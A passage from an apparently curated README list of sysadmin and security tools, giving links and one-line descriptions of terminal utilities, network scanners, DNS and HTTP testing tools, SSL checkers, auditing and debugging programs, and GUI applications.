the most and allow you to jump, without having to type the whole path.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/junegunn/fzf"><b>fzf</b></a> - is a general-purpose command-line fuzzy finder.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-autosuggestions"><b>zsh-autosuggestions</b></a> - Fish-like autosuggestions for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-syntax-highlighting"><b>zsh-syntax-highlighting</b></a> - Fish shell like syntax highlighting for Zsh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/unixorn/awesome-zsh-plugins"><b>Awesome ZSH Plugins</b></a> - A list of frameworks, plugins, themes and tutorials for ZSH.<br> </p> ##### :black_small_square: Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://midnight-commander.org/"><b>Midnight Commander</b></a> - is a visual file manager, licensed under GNU General Public License.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ranger/ranger"><b>ranger</b></a> - is a VIM-inspired filemanager for the console.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jarun/nnn"><b>nnn</b></a> - is a tiny, lightning fast, feature-packed file manager.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/screen/"><b>screen</b></a> - is a full-screen window manager that multiplexes a physical terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tmux/tmux/wiki"><b>tmux</b></a> - is a terminal multiplexer, lets you switch easily between several programs in one terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/peikk0/tmux-cssh"><b>tmux-cssh</b></a> - is a tool to set comfortable and easy to use functionality, clustering and synchronizing tmux-sessions.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ex-vi.sourceforge.net/"><b>vi</b></a> - is one of the most common text editors on Unix.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vim.org/"><b>vim</b></a> - is a highly configurable text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.gnu.org/software/emacs/"><b>emacs</b></a> - is an extensible, customizable, free/libre text editor, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zyedidia/micro"><b>micro</b></a> - is a modern and intuitive terminal-based text editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://neovim.io/"><b>neovim</b></a> - is a free open source, powerful, extensible and usable code editor.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.spacemacs.org/"><b>spacemacs</b></a> - a community-driven Emacs distribution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://spacevim.org/"><b>spacevim</b></a> - a community-driven vim distribution.<br> </p> ##### :black_small_square: Files and directories <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sharkdp/fd"><b>fd</b></a> - is a simple, fast and user-friendly alternative to find.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.yorhel.nl/ncdu"><b>ncdu</b></a> - is an easy to use, fast disk usage analyzer.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.putty.org/"><b>PuTTY</b></a> - is an SSH and telnet client, developed originally by Simon Tatham.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mosh.org/"><b>Mosh</b></a> - is a SSH wrapper designed to keep a SSH session alive over a volatile connection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://eternalterminal.dev/"><b>Eternal Terminal</b></a> - enables mouse-scrolling and tmux commands inside the SSH session.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nmap.org/"><b>nmap</b></a> - is a free and open source (license) utility for network discovery and security auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zmap/zmap"><b>zmap</b></a> - is a fast single packet network scanner designed for Internet-wide network surveys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RustScan/RustScan"><b>Rust Scan</b></a> - to find all open ports faster than Nmap.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/robertdavidgraham/masscan"><b>masscan</b></a> - is the fastest Internet port scanner, spews SYN packets asynchronously.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gvb84/pbscan"><b>pbscan</b></a> - is a faster and more efficient stateless SYN scanner and banner grabber.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.hping.org/"><b>hping</b></a> - is a command-line oriented TCP/IP packet assembler/analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/traviscross/mtr"><b>mtr</b></a> - is a tool that combines the functionality of the 'traceroute' and 'ping' programs in a single tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mehrdadrad/mylg"><b>mylg</b></a> - utility which combines the functions of the different network probes in one diagnostic tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netcat.sourceforge.net/"><b>netcat</b></a> - utility which reads and writes data across network connections, using the TCP/IP protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.tcpdump.org/"><b>tcpdump</b></a> - is a powerful command-line packet analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/docs/man-pages/tshark.html"><b>tshark</b></a> - is a tool that allows us to dump and analyze network traffic (wireshark cli).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://termshark.io/"><b>Termshark</b></a> - is a simple terminal user-interface for tshark.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jpr5/ngrep"><b>ngrep</b></a> - is like GNU grep applied to the network layer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://netsniff-ng.org/"><b>netsniff-ng</b></a> - is a Swiss army knife for your daily Linux network plumbing if you will.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mechpen/sockdump"><b>sockdump</b></a> - dump unix domain socket traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/stenographer"><b>stenographer</b></a> - is a packet capture solution which aims to quickly spool all packets to disk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sachaos/tcpterm"><b>tcpterm</b></a> - visualize packets in TUI.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tgraf/bmon"><b>bmon</b></a> - is a monitoring and debugging tool to capture networking related statistics and prepare them visually.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://iptraf.seul.org/2.6/manual.html#installation"><b>iptraf-ng</b></a> - is a console-based network monitoring program for Linux that displays information about IP traffic.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vergoh/vnstat"><b>vnstat</b></a> - is a network traffic monitor for Linux and BSD.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://iperf.fr/"><b>iPerf3</b></a> - is a tool for active measurements of the maximum achievable bandwidth on IP networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Microsoft/Ethr"><b>ethr</b></a> - is a Network Performance Measurement Tool for TCP, UDP & HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jwbensley/Etherate"><b>Etherate</b></a> - is a Linux CLI based Ethernet and MPLS traffic testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mpolden/echoip"><b>echoip</b></a> - is a IP address lookup service.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/troglobit/nemesis"><b>Nemesis</b></a> - packet manipulation CLI tool; craft and inject packets of several protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/packetfu/packetfu"><b>packetfu</b></a> - a mid-level packet manipulation library for Ruby.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://scapy.net/"><b>Scapy</b></a> - packet manipulation library; forge, send, decode, capture packets of a wide number of protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/SecureAuthCorp/impacket"><b>impacket</b></a> - is a collection of Python classes for working with network protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/arthepsy/ssh-audit"><b>ssh-audit</b></a> - is a tool for SSH server auditing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://aria2.github.io/"><b>aria2</b></a> - is a lightweight multi-protocol & multi-source command-line download utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/x-way/iptables-tracer"><b>iptables-tracer</b></a> - observe the path of packets through the iptables chains.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/proabiral/inception"><b>inception</b></a> - a highly configurable tool to check for whatever you like against any number of hosts.<br> </p> ##### :black_small_square: Network (DNS) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/farrokhi/dnsdiag"><b>dnsdiag</b></a> - is a DNS diagnostics and performance measurement tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mschwager/fierce"><b>fierce</b></a> - is a DNS reconnaissance tool for locating non-contiguous IP space.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/subfinder/subfinder"><b>subfinder</b></a> - is a subdomain discovery tool that discovers valid subdomains for websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/aboul3la/Sublist3r"><b>sublist3r</b></a> - is a fast subdomains enumeration tool for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/Amass"><b>amass</b></a> - is tool that obtains subdomain names by scraping data sources, crawling web archives, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/namebench"><b>namebench</b></a> - provides personalized DNS server recommendations based on your browsing history.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/blechschmidt/massdns"><b>massdns</b></a> - is a high-performance DNS stub resolver for bulk lookups and reconnaissance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/guelfoweb/knock"><b>knock</b></a> - is a tool to enumerate subdomains on a target domain through a wordlist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/DNS-OARC/dnsperf"><b>dnsperf</b></a> - DNS performance testing tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jedisct1/dnscrypt-proxy"><b>dnscrypt-proxy 2</b></a> - a flexible DNS proxy, with support for encrypted DNS protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dnsdb/dnsdbq"><b>dnsdbq</b></a> - API client providing access to passive DNS database systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/looterz/grimd"><b>grimd</b></a> - fast dns proxy, built to black-hole internet advertisements and malware servers.<br> </p> ##### :black_small_square: Network (HTTP) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://curl.haxx.se/"><b>curl</b></a> - is a command line tool and library for transferring data with URLs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gitlab.com/davidjpeacock/kurly"><b>kurly</b></a> - is an alternative to the widely popular curl program, written in Golang.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jakubroztocil/httpie"><b>HTTPie</b></a> - is an user-friendly HTTP client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/asciimoo/wuzz"><b>wuzz</b></a> - is an interactive cli tool for HTTP inspection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/summerwind/h2spec"><b>h2spec</b></a> - is a conformance testing tool for HTTP/2 implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gildasio/h2t"><b>h2t</b></a> - is a simple tool to help sysadmins to hardening their websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/htrace.sh"><b>htrace.sh</b></a> - is a simple Swiss Army knife for http/https troubleshooting and profiling.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/reorx/httpstat"><b>httpstat</b></a> - is a tool that visualizes curl statistics in a way of beauty and clarity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gchaincl/httplab"><b>httplab</b></a> - is an interactive web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lynx.browser.org/"><b>Lynx</b></a> - is a text browser for the World Wide Web.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/browsh-org/browsh/"><b>Browsh</b></a> - is a fully interactive, real-time, and modern text-based browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dhamaniasad/HeadlessBrowsers"><b>HeadlessBrowsers</b></a> - a list of (almost) all headless web browsers in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://httpd.apache.org/docs/2.4/programs/ab.html"><b>ab</b></a> - is a single-threaded command line tool for measuring the performance of HTTP web servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.joedog.org/siege-home/"><b>siege</b></a> - is an http load testing and benchmarking utility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/wg/wrk"><b>wrk</b></a> - is a modern HTTP benchmarking tool capable of generating significant load.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/giltene/wrk2"><b>wrk2</b></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tsenart/vegeta"><b>vegeta</b></a> - is a constant throughput, correct latency recording variant of wrk.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/codesenberg/bombardier"><b>bombardier</b></a> - is a fast cross-platform HTTP benchmarking tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cmpxchg16/gobench"><b>gobench</b></a> - http/https load testing and benchmarking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rakyll/hey"><b>hey</b></a> - HTTP load generator, ApacheBench (ab) replacement, formerly known as rakyll/boom.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tarekziade/boom"><b>boom</b></a> - is a script you can use to quickly smoke-test your web app deployment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/shekyan/slowhttptest"><b>SlowHTTPTest</b></a> - is a tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OJ/gobuster"><b>gobuster</b></a> - is a free and open source directory/file & DNS busting tool written in Go.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ssllabs/ssllabs-scan"><b>ssllabs-scan</b></a> - command-line reference-implementation client for SSL Labs APIs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/http-observatory"><b>http-observatory</b></a> - Mozilla HTTP Observatory cli version.<br> </p> ##### :black_small_square: SSL <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openssl.org/"><b>openssl</b></a> - is a robust, commercial-grade, and full-featured toolkit for the TLS and SSL protocols.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html"><b>gnutls-cli</b></a> - client program to set up a TLS connection to some other computer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nabla-c0d3/sslyze"><b>sslyze </b></a> - fast and powerful SSL/TLS server scanning library.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rbsec/sslscan"><b>sslscan</b></a> - tests SSL/TLS enabled services to discover supported cipher suites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/drwetter/testssl.sh"><b>testssl.sh</b></a> - testing TLS/SSL encryption anywhere on any port.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/cipherscan"><b>cipherscan</b></a> - a very simple way to find out which SSL ciphersuites are supported by a target.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.tarsnap.com/spiped.html"><b>spiped</b></a> - is a utility for creating symmetrically encrypted and authenticated pipes between socket addresses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/certbot/certbot"><b>Certbot</b></a> - is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/FiloSottile/mkcert"><b>mkcert</b></a> - simple zero-config tool to make locally trusted development certificates with any names you'd like.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/square/certstrap"><b>certstrap</b></a> - tools to bootstrap CAs, certificate requests, and signed certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/yassineaboukir/sublert"><b>Sublert</b></a> - is a security and reconnaissance tool to automatically monitor new subdomains.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/mkchain"><b>mkchain</b></a> - open source tool to help you build a valid SSL certificate chain.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/ch-selinux"><b>SELinux</b></a> - provides a flexible Mandatory Access Control (MAC) system built into the Linux kernel.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.ubuntu.com/AppArmor"><b>AppArmor</b></a> - proactively protects the operating system and applications from external or internal threats.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/grapheneX/grapheneX"><b>grapheneX</b></a> - Automated System Hardening Framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dev-sec/"><b>DevSec Hardening Framework</b></a> - Security + DevOps: Automatic Server Hardening.<br> </p> ##### :black_small_square: Auditing Tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ossec.net/"><b>ossec</b></a> - actively monitoring all aspects of system activity with file integrity monitoring.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"><b>auditd</b></a> - provides a way to track security-relevant information on your system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.nongnu.org/tiger/"><b>Tiger</b></a> - is a security tool that can be use both as a security audit and intrusion detection system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cisofy.com/lynis/"><b>Lynis</b></a> - battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rebootuser/LinEnum"><b>LinEnum</b></a> - scripted Local Linux Enumeration & Privilege Escalation Checks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/installation/rkhunter"><b>Rkhunter</b></a> - scanner tool for Linux systems that scans backdoors, rootkits and local exploits on your systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hasherezade/pe-sieve"><b>PE-sieve</b></a> - is a light-weight tool that helps to detect malware running on the system.<br> </p> ##### :black_small_square: System Diagnostics/Debuggers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/strace/strace"><b>strace</b></a> - diagnostic, debugging and instructional userspace utility for Linux.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://dtrace.org/blogs/about/"><b>DTrace</b></a> - is a performance analysis and troubleshooting tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Ltrace"><b>ltrace</b></a> - is a library call tracer, used to trace calls made by programs to library functions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/brainsmoke/ptrace-burrito"><b>ptrace-burrito</b></a> - is a friendly wrapper around ptrace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/brendangregg/perf-tools"><b>perf-tools</b></a> - performance analysis tools based on Linux perf_events (aka perf) and ftrace.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/iovisor/bpftrace"><b>bpftrace</b></a> - high-level tracing language for Linux eBPF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/draios/sysdig"><b>sysdig</b></a> - system exploration and troubleshooting tool with first class support for containers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.valgrind.org/"><b>Valgrind</b></a> - is an instrumentation framework for building dynamic analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gperftools/gperftools"><b>gperftools</b></a> - high-performance multi-threaded malloc() implementation, plus some performance analysis tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nicolargo.github.io/glances/"><b>glances</b></a> - cross-platform system monitoring tool written in Python.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hishamhm/htop"><b>htop</b></a> - interactive text-mode process viewer for Unix systems. It aims to be a better 'top'.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/aristocratos/bashtop"><b>bashtop</b></a> - Linux resource monitor written in pure Bash.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://nmon.sourceforge.net/pmwiki.php"><b>nmon</b></a> - a single executable for performance monitoring and data analysis.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.atoptool.nl/"><b>atop</b></a> - ASCII performance monitor. Includes statistics for CPU, memory, disk, swap, network, and processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Lsof"><b>lsof</b></a> - displays in its output information about files that are opened by processes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.brendangregg.com/flamegraphs.html"><b>FlameGraph</b></a> - stack trace visualizer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zevv/lsofgraph"><b>lsofgraph</b></a> - convert Unix lsof output to a graph showing FIFO and UNIX interprocess communication.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/rr"><b>rr</b></a> - is a lightweight tool for recording, replaying and debugging execution of applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pcp.io/index.html"><b>Performance Co-Pilot</b></a> - a system performance analysis toolkit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sharkdp/hexyl"><b>hexyl</b></a> - a command-line hex viewer.<br> </p> ##### :black_small_square: Log Analyzers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rcoh/angle-grinder"><b>angle-grinder</b></a> - slice and dice log files on the command line.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lnav.org"><b>lnav</b></a> - log file navigator with search and automatic refresh.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://goaccess.io/"><b>GoAccess</b></a> - real-time web log analyzer and interactive viewer that runs in a terminal.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/lebinh/ngxtop"><b>ngxtop</b></a> - real-time metrics for nginx server.<br> </p> ##### :black_small_square: Databases <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/xo/usql"><b>usql</b></a> - universal command-line interface for SQL databases.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/pgcli"><b>pgcli</b></a> - postgres CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/mycli"><b>mycli</b></a> - terminal client for MySQL with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dbcli/litecli"><b>litecli</b></a> - SQLite CLI with autocompletion and syntax highlighting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/osquery/osquery"><b>OSQuery</b></a> - is a SQL powered operating system instrumentation, monitoring, and analytics framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ankane/pgsync"><b>pgsync</b></a> - sync data from one Postgres database to another.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/laixintao/iredis"><b>iredis</b></a> - a terminal client for redis with autocompletion and syntax highlighting.<br> </p> ##### :black_small_square: TOR <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GouveaHeitor/nipe"><b>Nipe</b></a> - script to make Tor Network your default gateway.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/trimstray/multitor"><b>multitor</b></a> - a tool that lets you create multiple TOR instances with a load-balancing.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://irssi.org"><b>Irssi</b></a> - is a free open source terminal based IRC client.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weechat.org/"><b>WeeChat</b></a> - is an extremely extensible and lightweight IRC client.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/skx/sysadmin-util"><b>sysadmin-util</b></a> - tools for Linux/Unix sysadmins.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://inotify.aiken.cz/"><b>incron</b></a> - is an inode-based filesystem notification technology.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/axkibe/lsyncd"><b>lsyncd</b></a> - synchronizes local directories with remote targets (Live Syncing Daemon).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rgburke/grv"><b>GRV</b></a> - is a terminal based interface for viewing Git repositories.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jonas.github.io/tig/"><b>Tig</b></a> - text-mode interface for Git.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tldr-pages/tldr"><b>tldr</b></a> - simplified and community-driven man pages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mholt/archiver"><b>archiver</b></a> - easily create and extract .zip, .tar, .tar.gz, .tar.bz2, .tar.xz, .tar.lz4, .tar.sz, and .rar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tj/commander.js"><b>commander.js</b></a> - minimal CLI creator in JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tomnomnom/gron"><b>gron</b></a> - make JSON greppable!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/itchyny/bed"><b>bed</b></a> - binary editor written in Go.<br> </p> #### GUI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Terminal emulators <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Guake/guake"><b>Guake</b></a> - is a dropdown terminal made for the GNOME desktop environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnometerminator.blogspot.com/p/introduction.html"><b>Terminator</b></a> - is based on GNOME Terminal, useful features for sysadmins and other users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sw.kovidgoyal.net/kitty/"><b>Kitty</b></a> - is a GPU based terminal emulator that supports smooth scrolling and images.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/"><b>Wireshark</b></a> - is the worldโ€™s foremost and widely-used network protocol analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ettercap-project.org/"><b>Ettercap</b></a> - is a comprehensive network monitor tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://etherape.sourceforge.io/"><b>EtherApe</b></a> - is a graphical network monitoring solution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetsender.com/"><b>Packet Sender</b></a> - is a networking utility for packet generation and built-in UDP/TCP/SSL client and servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ostinato.org/"><b>Ostinato</b></a> - is a packet crafter and traffic generator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jmeter.apache.org/"><b>JMeterโ„ข</b></a> - open source software to load test functional behavior and measure performance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/locustio/locust"><b>locust</b></a> - scalable user load testing tool written in Python.<br> </p> ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.torproject.org/"><b>TOR Browser</b></a> - protect your privacy and defend yourself against network surveillance and traffic analysis.<br> </p> ##### :black_small_square: Password Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keepassxc.org/"><b>KeePassXC</b></a> - store your passwords safely and auto-type them into your everyday websites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.enpass.io/"><b>Enpass</b></a> - password manager and secure wallet.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hexchat.github.io/index.html"><b>HexChat</b></a> - is an IRC client based on XChat.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pidgin.im/"><b>Pidgin</b></a> - is an easy to use and free chat client used by millions.<br> </p> ##### :black_small_square: Messengers (end-to-end encryption) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.signal.org/"><b>Signal</b></a> - is an encrypted communications app.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wire.com/en/"><b>Wire</b></a> - secure messaging, file sharing, voice calls and video conferences. All protected with end-to-end encryption.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/prof7bit/TorChat"><b>TorChat</b></a> - decentralized anonymous instant messenger on top of Tor Hidden Services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://matrix.org/"><b>Matrix</b></a> - an open network for secure, decentralized, real-time communication.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.sublimetext.com/3"><b>Sublime Text</b></a> - is a lightweight, cross-platform code editor known for its speed, ease of use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://code.visualstudio.com/"><b>Visual Studio Code</b></a> - an open-source and free source code editor developed by Microsoft.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atom.io/"><b>Atom</b></a> - a hackable text editor for the 21st Century.<br> </p> #### Web Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a 